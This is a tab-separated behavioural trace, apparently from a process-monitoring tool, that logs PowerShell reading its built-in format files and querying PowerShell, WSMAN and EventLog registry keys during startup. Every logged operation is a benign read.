File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096	5	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096	17	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3022	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 50, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 281	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096	62	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 3895	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 201, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 4096	21	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 3687	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 409, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 4096	4	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 2228	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 844, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 4096	4	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 3736	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 360, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
